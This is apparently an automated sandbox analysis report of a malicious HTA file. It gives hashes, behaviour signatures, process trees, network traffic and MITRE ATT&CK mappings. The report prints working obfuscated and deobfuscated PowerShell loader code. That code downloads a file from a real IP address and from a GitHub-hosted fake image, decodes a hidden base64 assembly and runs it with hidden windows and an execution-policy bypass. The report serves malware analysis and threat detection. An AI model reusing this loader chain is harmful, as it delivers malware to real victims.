008009858f9248a8d5f220f5f4a999438ec8c6218e97560ccde06b35cebd3fe4

Analysis

max time kernel
145s
max time network
149s
platform
windows10-2004_x64
resource
win10v2004-20241007-en
resource tags

arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
submitted
17/10/2024, 14:03 UTC

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

nicetokissthebestthingsiwantotgetmebackwith.hta
Size

130KB
MD5

b581033fd1ba02c7724802d3ccda9b5b
SHA1

ad4484b11cfd436200542cc8e4fbaebcb7491bf8
SHA256

008009858f9248a8d5f220f5f4a999438ec8c6218e97560ccde06b35cebd3fe4
SHA512

12c49b5ace4caf4ee56726ab8c19ace2e95f5a8c5478edd9f3076dcd3a659f6aa0240fbad95083657512cb22a4d8c5d0f57c1374e1dddc90f7f56389daac8d47
SSDEEP

192:Ea2xiqX85ziqI8o33MAEyNiqIiqaH8niqyCT:UxR85za88MZ0Kw8nX

Score

10^/10

defense_evasion discovery execution

Malware Config

Extracted

Language

ps1

Deobfuscated

# powershell snippet 0

invoke-expression "$imageUrl = 'https://raw.githubusercontent.com/CryptersAndToolsOficial/ZIP/refs/heads/main/DetahNote_V.jpg ';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$vaiMethod = [dnlib.IO.Home].GetMethod('VAI');$vaiMethod.Invoke($null, @('txt.RDCCNM/055/831.922.571.701//:ptth', 'desativado', 'desativado', 'desativado', 'RegAsm', 'desativado', 'desativado'));"

# powershell snippet 1

$imageurl = "https://raw.githubusercontent.com/CryptersAndToolsOficial/ZIP/refs/heads/main/DetahNote_V.jpg "

$webclient = new-object system.net.webclient

$imagebytes = $webclient.downloaddata("https://raw.githubusercontent.com/CryptersAndToolsOficial/ZIP/refs/heads/main/DetahNote_V.jpg ")

$imagetext = ([system.text.encoding]::ascii).getstring($imagebytes)

$startflag = "<<BASE64_START>>"

$endflag = "<<BASE64_END>>"

$startindex = $imagetext.indexof("<<BASE64_START>>")

$endindex = $imagetext.indexof("<<BASE64_END>>")

$startindex -ge 0 -and $endindex -gt $startindex

$startindex = $startflag.length

$base64length = $endindex - $startindex

$base64command = $imagetext.substring($startindex, $base64length)

$commandbytes = [system.convert]::frombase64string($base64command)

$loadedassembly = [system.reflection.assembly]::load($commandbytes)

$vaimethod = ([dnlib.io.home]).getmethod("VAI")

$vaimethod.invoke($null, "txt.RDCCNM/055/831.922.571.701//:ptth", "desativado", "desativado", "desativado", "RegAsm", "desativado", "desativado")

URLs

ps1.dropper

https://raw.githubusercontent.com/CryptersAndToolsOficial/ZIP/refs/heads/main/DetahNote_V.jpg%20

exe.dropper

https://raw.githubusercontent.com/CryptersAndToolsOficial/ZIP/refs/heads/main/DetahNote_V.jpg%20

Signatures

Blocklisted process makes network request 3 IoCs

flow	pid	Process
20	980	pOWERSHELl.EXE
23	2808	powershell.exe
25	2808	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

Run Powershell and hide display window.

execution

PowerShell

T1059.001

pid	Process
2572	powershell.exe
2808	powershell.exe

Evasion via Device Credential Deployment 2 IoCs

defense_evasion execution

pid	Process
980	pOWERSHELl.EXE
732	powershell.exe

Checks computer location settings 2 TTPs 2 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation	mshta.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation	WScript.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service

T1102

flow	ioc
22	raw.githubusercontent.com
23	raw.githubusercontent.com

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 8 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	pOWERSHELl.EXE
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	csc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cvtres.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WScript.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	mshta.exe

Modifies registry class 1 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000_Classes\Local Settings	pOWERSHELl.EXE

Suspicious behavior: EnumeratesProcesses 8 IoCs

pid	Process
980	pOWERSHELl.EXE
980	pOWERSHELl.EXE
732	powershell.exe
732	powershell.exe
2572	powershell.exe
2572	powershell.exe
2808	powershell.exe
2808	powershell.exe

Suspicious use of AdjustPrivilegeToken 4 IoCs

description	pid	Process
Token: SeDebugPrivilege	980	pOWERSHELl.EXE
Token: SeDebugPrivilege	732	powershell.exe
Token: SeDebugPrivilege	2572	powershell.exe
Token: SeDebugPrivilege	2808	powershell.exe

Suspicious use of WriteProcessMemory 21 IoCs

description	pid	Process	procid_target
PID 5096 wrote to memory of 980	5096	mshta.exe	87
PID 5096 wrote to memory of 980	5096	mshta.exe	87
PID 5096 wrote to memory of 980	5096	mshta.exe	87
PID 980 wrote to memory of 732	980	pOWERSHELl.EXE	89
PID 980 wrote to memory of 732	980	pOWERSHELl.EXE	89
PID 980 wrote to memory of 732	980	pOWERSHELl.EXE	89
PID 980 wrote to memory of 400	980	pOWERSHELl.EXE	94
PID 980 wrote to memory of 400	980	pOWERSHELl.EXE	94
PID 980 wrote to memory of 400	980	pOWERSHELl.EXE	94
PID 400 wrote to memory of 1460	400	csc.exe	95
PID 400 wrote to memory of 1460	400	csc.exe	95
PID 400 wrote to memory of 1460	400	csc.exe	95
PID 980 wrote to memory of 1776	980	pOWERSHELl.EXE	98
PID 980 wrote to memory of 1776	980	pOWERSHELl.EXE	98
PID 980 wrote to memory of 1776	980	pOWERSHELl.EXE	98
PID 1776 wrote to memory of 2572	1776	WScript.exe	99
PID 1776 wrote to memory of 2572	1776	WScript.exe	99
PID 1776 wrote to memory of 2572	1776	WScript.exe	99
PID 2572 wrote to memory of 2808	2572	powershell.exe	103
PID 2572 wrote to memory of 2808	2572	powershell.exe	103
PID 2572 wrote to memory of 2808	2572	powershell.exe	103

C:\Windows\SysWOW64\mshta.exe
C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\nicetokissthebestthingsiwantotgetmebackwith.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
1⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:5096
- C:\Windows\SysWOW64\WInDOwSpoWershELL\v1.0\pOWERSHELl.EXE
  "C:\Windows\sysTEM32\WInDOwSpoWershELL\v1.0\pOWERSHELl.EXE" "pOweRSHell.eXE -eX ByPASS -nOp -W 1 -C DeviCEcreDentIALDePLoymENt.Exe ; ieX($(iEx('[sYstem.teXT.EnCodiNg]'+[CHaR]0X3A+[ChAr]0X3a+'utf8.geTStRIng([SYSTem.conVeRT]'+[cHar]0X3a+[cHAr]0x3a+'fRoMbAse64STRINg('+[chAr]0x22+'JFo4ViAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYURELXRZcGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1tRU1CRVJERWZJTmlUaW9uICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidVJMTU9OLmRMTCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBrRlJJT2lCTCxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIG9DWWksc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBvcUxvWVAsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgTUR1anZLSyxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENJWW9nV3RNZXIpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYW1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAicXJVa0NtTXZhTkgiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbmFNZVNwQUNFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBYZEJMQnd6U21nZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJFo4Vjo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzEwNy4xNzUuMjI5LjEzOC81NTAvc2VldGhlYmVzdHBpY3R1cmV3aXRoZ3JlYXR0aGluZ3NpbmxpbmVhbHdheXMudElGIiwiJEVudjpBUFBEQVRBXHNlZXRoZWJlc3RwaWN0dXJld2l0aGdyZWF0dGhpbmdzaW5saW5lYS52YlMiLDAsMCk7c1RhcnQtU0xFZVAoMyk7U3RhclQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZW52OkFQUERBVEFcc2VldGhlYmVzdHBpY3R1cmV3aXRoZ3JlYXR0aGluZ3NpbmxpbmVhLnZiUyI='+[char]34+'))')))"
  2⤵
  - Blocklisted process makes network request
  - Evasion via Device Credential Deployment
  - System Location Discovery: System Language Discovery
  - Modifies registry class
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:980
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -eX ByPASS -nOp -W 1 -C DeviCEcreDentIALDePLoymENt.Exe
    3⤵
    - Evasion via Device Credential Deployment
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:732
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\s030lo1t\s030lo1t.cmdline"
    3⤵
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:400
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
      C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESE2AF.tmp" "c:\Users\Admin\AppData\Local\Temp\s030lo1t\CSC5172CEE6EAF4E3D8AAF69891B54891.TMP"
      4⤵
      System Location Discovery: System Language Discovery
      PID:1460
- - C:\Windows\SysWOW64\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\seethebestpicturewithgreatthingsinlinea.vbS"
    3⤵
    - Checks computer location settings
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:1776
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LiggJFNoRUxMSWRbMV0rJHNoRWxMSURbMTNdKydYJykoICgoJ3sxfWltYWdlVXJsID0gezB9aHR0cHM6Ly9yYXcuZ2l0aHVidXNlcmNvbnRlbnQuY29tL0NyeXB0ZXJzQW5kVG9vbHNPZicrJ2ljaWFsL1pJUC9yZWZzL2hlYWRzL21haW4vRGV0YWhOb3RlX1YuanBnIHswfTt7MX13ZWJDbGllbnQgPSBOZXctT2JqZWN0IFN5c3RlbS5OZXQuV2ViQ2xpZW50O3snKycxfWltYWdlQnl0ZXMgPSB7MX0nKyd3ZWJDbGllbnQuRG8nKyd3bmxvYWREYXRhKHsxfWltYWdlVXJsKTt7MX1pbWFnZVRleHQgPSBbUycrJ3lzdGVtLlRleHQuRW5jbycrJ2RpbmddOjpVVEY4LkdldFN0cmluZyh7MX1pbWFnZUJ5dGVzKTt7MX1zdGFydEZsYWcgPSB7MH08PEJBU0U2NF9TVEFSVCcrJz4+ezB9O3sxfWVuZEZsYWcgPSB7MH08PEJBU0U2NF9FTkQ+PnswfTt7MX1zdGFydEluZGV4ID0gezF9aW1hZ2VUZXh0LkluZGV4T2YoezF9c3RhcnRGbGFnKTt7MX1lbmRJbmRleCA9IHsxfWknKydtYWdlVGV4dC5JbmRlJysneCcrJ09mKHsxfWVuJysnZEZsYWcpO3sxfXN0YXJ0SW5kZXggLWdlIDAgLWFuZCB7MX1lbmRJbmRleCAtZycrJ3QnKycgezF9cycrJ3RhcnRJbmRleDt7MX1zdGFydEluZGV4ICs9IHsxfXN0YXJ0RmxhZy5MZW5ndGg7ezF9YmFzZTY0TGVuZ3RoID0gezF9ZW5kSW5kZXggLSB7MX1zdGFydEluZGV4O3sxfWJhc2U2NENvbW1hbmQgPSB7MX1pbWFnZVRleHQuU3Vic3RyaW5nKHsxfXN0YXJ0SW5kZXgsIHsxfWJhc2U2NExlbmd0aCk7ezF9Y29tbWFuZEJ5dGVzID0gW1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnKyd7MX1iYXNlNjRDb21tYW5kKTt7MX1sb2FkZWRBc3NlbWJseSA9IFtTeXN0ZW0uUmVmbGVjdGlvbi5Bc3NlbWJseV0nKyc6OkxvYWQoezF9Y29tbWFuZEJ5dGVzKScrJzt7MX12YWlNZXRob2QgPSBbZG5sJysnaWIuSU8uSG9tZV0uR2V0TWV0aG9kKHswfVZBSXswfSk7ezF9dmFpTWV0aG9kLkludm9rZSh7MX1udWxsLCBAKHswfXR4dC5SRENDTk0vMDU1LzgzMS45MjIuNTcxLjcwMS8vOnB0dGh7MH0sIHswfWRlcycrJ2F0aXZhZG97MH0sIHswfWRlc2F0aXZhZG97MCcrJ30sIHswfWRlc2F0aXZhZG97MH0sIHswfVJlZ0FzbScrJ3swfSwgezB9ZGVzYXRpdmFkb3swfSwgezB9ZGVzYXRpdmFkb3swfSkpOycpICAtRltjaEFSXTM5LFtjaEFSXTM2KSAp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
      4⤵
      Command and Scripting Interpreter: PowerShell
      System Location Discovery: System Language Discovery
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of WriteProcessMemory
      PID:2572
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ".( $ShELLId[1]+$shElLID[13]+'X')( (('{1}imageUrl = {0}https://raw.githubusercontent.com/CryptersAndToolsOf'+'icial/ZIP/refs/heads/main/DetahNote_V.jpg {0};{1}webClient = New-Object System.Net.WebClient;{'+'1}imageBytes = {1}'+'webClient.Do'+'wnloadData({1}imageUrl);{1}imageText = [S'+'ystem.Text.Enco'+'ding]::UTF8.GetString({1}imageBytes);{1}startFlag = {0}<<BASE64_START'+'>>{0};{1}endFlag = {0}<<BASE64_END>>{0};{1}startIndex = {1}imageText.IndexOf({1}startFlag);{1}endIndex = {1}i'+'mageText.Inde'+'x'+'Of({1}en'+'dFlag);{1}startIndex -ge 0 -and {1}endIndex -g'+'t'+' {1}s'+'tartIndex;{1}startIndex += {1}startFlag.Length;{1}base64Length = {1}endIndex - {1}startIndex;{1}base64Command = {1}imageText.Substring({1}startIndex, {1}base64Length);{1}commandBytes = [System.Convert]::FromBase64String('+'{1}base64Command);{1}loadedAssembly = [System.Reflection.Assembly]'+'::Load({1}commandBytes)'+';{1}vaiMethod = [dnl'+'ib.IO.Home].GetMethod({0}VAI{0});{1}vaiMethod.Invoke({1}null, @({0}txt.RDCCNM/055/831.922.571.701//:ptth{0}, {0}des'+'ativado{0}, {0}desativado{0'+'}, {0}desativado{0}, {0}RegAsm'+'{0}, {0}desativado{0}, {0}desativado{0}));') -F[chAR]39,[chAR]36) )"
        5⤵
        Blocklisted process makes network request
        Command and Scripting Interpreter: PowerShell
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2808

Network

DNS

154.239.44.20.in-addr.arpa

Remote address:

8.8.8.8:53

Request

154.239.44.20.in-addr.arpa

IN PTR

Response
DNS

70.209.201.84.in-addr.arpa

Remote address:

8.8.8.8:53

Request

70.209.201.84.in-addr.arpa

IN PTR

Response
DNS

68.159.190.20.in-addr.arpa

Remote address:

8.8.8.8:53

Request

68.159.190.20.in-addr.arpa

IN PTR

Response
DNS

95.221.229.192.in-addr.arpa

Remote address:

8.8.8.8:53

Request

95.221.229.192.in-addr.arpa

IN PTR

Response
DNS

55.36.223.20.in-addr.arpa

Remote address:

8.8.8.8:53

Request

55.36.223.20.in-addr.arpa

IN PTR

Response
DNS

55.36.223.20.in-addr.arpa

Remote address:

8.8.8.8:53

Request

55.36.223.20.in-addr.arpa

IN PTR
GET

http://107.175.229.138/550/seethebestpicturewithgreatthingsinlinealways.tIF

pOWERSHELl.EXE

Remote address:

107.175.229.138:80

Request

GET /550/seethebestpicturewithgreatthingsinlinealways.tIF HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
Host: 107.175.229.138
Connection: Keep-Alive

Response

HTTP/1.1 200 OK

Date: Thu, 17 Oct 2024 14:03:14 GMT
Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30
Last-Modified: Thu, 17 Oct 2024 08:32:14 GMT
ETag: "2fcf4-624a806096725"
Accept-Ranges: bytes
Content-Length: 195828
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: image/tiff
DNS

138.229.175.107.in-addr.arpa

Remote address:

8.8.8.8:53

Request

138.229.175.107.in-addr.arpa

IN PTR

Response

138.229.175.107.in-addr.arpa

IN PTR

107-175-229-138-hostcolocrossingcom
DNS

raw.githubusercontent.com

powershell.exe

Remote address:

8.8.8.8:53

Request

raw.githubusercontent.com

IN A

Response

raw.githubusercontent.com

IN A

185.199.111.133

raw.githubusercontent.com

IN A

185.199.110.133

raw.githubusercontent.com

IN A

185.199.108.133

raw.githubusercontent.com

IN A

185.199.109.133
GET

https://raw.githubusercontent.com/CryptersAndToolsOficial/ZIP/refs/heads/main/DetahNote_V.jpg

powershell.exe

Remote address:

185.199.111.133:443

Request

GET /CryptersAndToolsOficial/ZIP/refs/heads/main/DetahNote_V.jpg HTTP/1.1
Host: raw.githubusercontent.com
Connection: Keep-Alive

Response

HTTP/1.1 200 OK

Connection: keep-alive
Content-Length: 6331693
Cache-Control: max-age=300
Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
Content-Type: application/octet-stream
ETag: "c7af5123730da5215a9032249afad007dd54a2bf216bbf720e484463b4eebacd"
Strict-Transport-Security: max-age=31536000
X-Content-Type-Options: nosniff
X-Frame-Options: deny
X-XSS-Protection: 1; mode=block
X-GitHub-Request-Id: 30EF:73EE:6DC9F6:85655F:67111895
Accept-Ranges: bytes
Date: Thu, 17 Oct 2024 14:03:20 GMT
Via: 1.1 varnish
X-Served-By: cache-lcy-eglc8600063-LCY
X-Cache: HIT
X-Cache-Hits: 0
X-Timer: S1729173800.460843,VS0,VE1
Vary: Authorization,Accept-Encoding,Origin
Access-Control-Allow-Origin: *
Cross-Origin-Resource-Policy: cross-origin
X-Fastly-Request-ID: e4ed86fe2eb7c41e8286b7ce289f51144def7074
Expires: Thu, 17 Oct 2024 14:08:20 GMT
Source-Age: 147
DNS

133.111.199.185.in-addr.arpa

Remote address:

8.8.8.8:53

Request

133.111.199.185.in-addr.arpa

IN PTR

Response

133.111.199.185.in-addr.arpa

IN PTR

cdn-185-199-111-133githubcom
DNS

133.111.199.185.in-addr.arpa

Remote address:

8.8.8.8:53

Request

133.111.199.185.in-addr.arpa

IN PTR
DNS

133.111.199.185.in-addr.arpa

Remote address:

8.8.8.8:53

Request

133.111.199.185.in-addr.arpa

IN PTR
GET

http://107.175.229.138/550/MNCCDR.txt

powershell.exe

Remote address:

107.175.229.138:80

Request

GET /550/MNCCDR.txt HTTP/1.1
Host: 107.175.229.138
Connection: Keep-Alive

Response

HTTP/1.1 200 OK

Date: Thu, 17 Oct 2024 14:03:23 GMT
Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30
Last-Modified: Thu, 17 Oct 2024 08:29:29 GMT
ETag: "a1000-624a7fc352999"
Accept-Ranges: bytes
Content-Length: 659456
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/plain
DNS

133.211.185.52.in-addr.arpa

Remote address:

8.8.8.8:53

Request

133.211.185.52.in-addr.arpa

IN PTR

Response
DNS

200.163.202.172.in-addr.arpa

Remote address:

8.8.8.8:53

Request

200.163.202.172.in-addr.arpa

IN PTR

Response
DNS

198.187.3.20.in-addr.arpa

Remote address:

8.8.8.8:53

Request

198.187.3.20.in-addr.arpa

IN PTR

Response
DNS

88.210.23.2.in-addr.arpa

Remote address:

8.8.8.8:53

Request

88.210.23.2.in-addr.arpa

IN PTR

Response

88.210.23.2.in-addr.arpa

IN PTR

a2-23-210-88deploystaticakamaitechnologiescom
DNS

43.229.111.52.in-addr.arpa

Remote address:

8.8.8.8:53

Request

43.229.111.52.in-addr.arpa

IN PTR

Response
DNS

172.210.232.199.in-addr.arpa

Remote address:

8.8.8.8:53

Request

172.210.232.199.in-addr.arpa

IN PTR

Response
DNS

172.214.232.199.in-addr.arpa

Remote address:

8.8.8.8:53

Request

172.214.232.199.in-addr.arpa

IN PTR

Response
DNS

172.214.232.199.in-addr.arpa

Remote address:

8.8.8.8:53

Request

172.214.232.199.in-addr.arpa

IN PTR
DNS

172.214.232.199.in-addr.arpa

Remote address:

8.8.8.8:53

Request

172.214.232.199.in-addr.arpa

IN PTR
DNS

9.179.89.13.in-addr.arpa

Remote address:

8.8.8.8:53

Request

9.179.89.13.in-addr.arpa

IN PTR

Response

107.175.229.138:80

http://107.175.229.138/550/seethebestpicturewithgreatthingsinlinealways.tIF

http

pOWERSHELl.EXE

7.2kB
202.0kB
149
146

HTTP Request

GET http://107.175.229.138/550/seethebestpicturewithgreatthingsinlinealways.tIF

HTTP Response

200
185.199.111.133:443

https://raw.githubusercontent.com/CryptersAndToolsOficial/ZIP/refs/heads/main/DetahNote_V.jpg

tls, http

powershell.exe

123.3kB
6.5MB
2593
4692

HTTP Request

GET https://raw.githubusercontent.com/CryptersAndToolsOficial/ZIP/refs/heads/main/DetahNote_V.jpg

HTTP Response

200
107.175.229.138:80

http://107.175.229.138/550/MNCCDR.txt

http

powershell.exe

4.9kB
197.1kB
99
143

HTTP Request

GET http://107.175.229.138/550/MNCCDR.txt

HTTP Response

200

8.8.8.8:53

154.239.44.20.in-addr.arpa

dns

72 B
158 B
1
1

DNS Request

154.239.44.20.in-addr.arpa
8.8.8.8:53

70.209.201.84.in-addr.arpa

dns

72 B
132 B
1
1

DNS Request

70.209.201.84.in-addr.arpa
8.8.8.8:53

68.159.190.20.in-addr.arpa

dns

72 B
158 B
1
1

DNS Request

68.159.190.20.in-addr.arpa
8.8.8.8:53

95.221.229.192.in-addr.arpa

dns

73 B
144 B
1
1

DNS Request

95.221.229.192.in-addr.arpa
8.8.8.8:53

55.36.223.20.in-addr.arpa

dns

142 B
157 B
2
1

DNS Request

55.36.223.20.in-addr.arpa

DNS Request

55.36.223.20.in-addr.arpa
8.8.8.8:53

138.229.175.107.in-addr.arpa

dns

74 B
125 B
1
1

DNS Request

138.229.175.107.in-addr.arpa
8.8.8.8:53

raw.githubusercontent.com

dns

powershell.exe

71 B
135 B
1
1

DNS Request

raw.githubusercontent.com

DNS Response

185.199.111.133

185.199.110.133

185.199.108.133

185.199.109.133
8.8.8.8:53

133.111.199.185.in-addr.arpa

dns

222 B
118 B
3
1

DNS Request

133.111.199.185.in-addr.arpa

DNS Request

133.111.199.185.in-addr.arpa

DNS Request

133.111.199.185.in-addr.arpa
8.8.8.8:53

133.211.185.52.in-addr.arpa

dns

73 B
147 B
1
1

DNS Request

133.211.185.52.in-addr.arpa
8.8.8.8:53

200.163.202.172.in-addr.arpa

dns

74 B
160 B
1
1

DNS Request

200.163.202.172.in-addr.arpa
8.8.8.8:53

198.187.3.20.in-addr.arpa

dns

71 B
157 B
1
1

DNS Request

198.187.3.20.in-addr.arpa
8.8.8.8:53

88.210.23.2.in-addr.arpa

dns

70 B
133 B
1
1

DNS Request

88.210.23.2.in-addr.arpa
8.8.8.8:53

43.229.111.52.in-addr.arpa

dns

72 B
158 B
1
1

DNS Request

43.229.111.52.in-addr.arpa
8.8.8.8:53

172.210.232.199.in-addr.arpa

dns

74 B
128 B
1
1

DNS Request

172.210.232.199.in-addr.arpa
8.8.8.8:53

172.214.232.199.in-addr.arpa

dns

222 B
128 B
3
1

DNS Request

172.214.232.199.in-addr.arpa

DNS Request

172.214.232.199.in-addr.arpa

DNS Request

172.214.232.199.in-addr.arpa
8.8.8.8:53

9.179.89.13.in-addr.arpa

dns

70 B
144 B
1
1

DNS Request

9.179.89.13.in-addr.arpa

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\pOWERSHELl.EXE.log

Filesize
2KB

MD5
3d086a433708053f9bf9523e1d87a4e8

SHA1
b3ab5d4f282a4c8fe8c3005b8a557ed5a0e37f28

SHA256
6f8fd1b8d9788ad54eaeee329232187e24b7b43393a01aeba2d6e9675231fb69

SHA512
931ae42b4c68a4507ff2342332b08eb407050d47cf4176137ea022d0f6e513c689e998445a04c6d18d4877391705c586bfce0234632b898d41aaed0957996dfd

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
18KB

MD5
960f18cbaa4c2d7cf0af9a30d04a3c38

SHA1
d8278b8ba53c768c4bae83b49e91638e180daa99

SHA256
82bff83f398f6835c188ac6788745a624c097a93f75d263d2610741e2a60aea0

SHA512
9ea42a895ac38e82ae2d2c5b7deca81bc7d1c421ab344e04d7ca7ae38232704cbc482fa7e26d00f95032fe6e9efdf71bfc6e9abb2ccbb0d7bd3a26b74895a6b1

Download Submit
C:\Users\Admin\AppData\Local\Temp\RESE2AF.tmp

Filesize
1KB

MD5
8617356a4d3911959c1be23dd4380c06

SHA1
9ea2550469c9fc181bdc97691bfdbe0c8f01fded

SHA256
4674b429161fddabc1ac4edb62905da681fa50ebe7fcbff11c6bc5fb56b22c9a

SHA512
62edfd857012b7a3029f3872d67237ab6ba82ea979a487a105e7170559cdf64f3da3c87bffa8a812e7d9bc8e75aa972b2d04ce0f7f11ef0ff7621fc905c2efa2

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_3d1dscy0.jxh.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\s030lo1t\s030lo1t.dll

Filesize
3KB

MD5
96152b851971585e1ac4891f55f09a85

SHA1
d731a13edd91d27ffc59e3952ccb50fd5faed615

SHA256
3e22d936819695881fc5a6ea8d71b7ac5fb187d73fb3add65ded0ec5627a9d23

SHA512
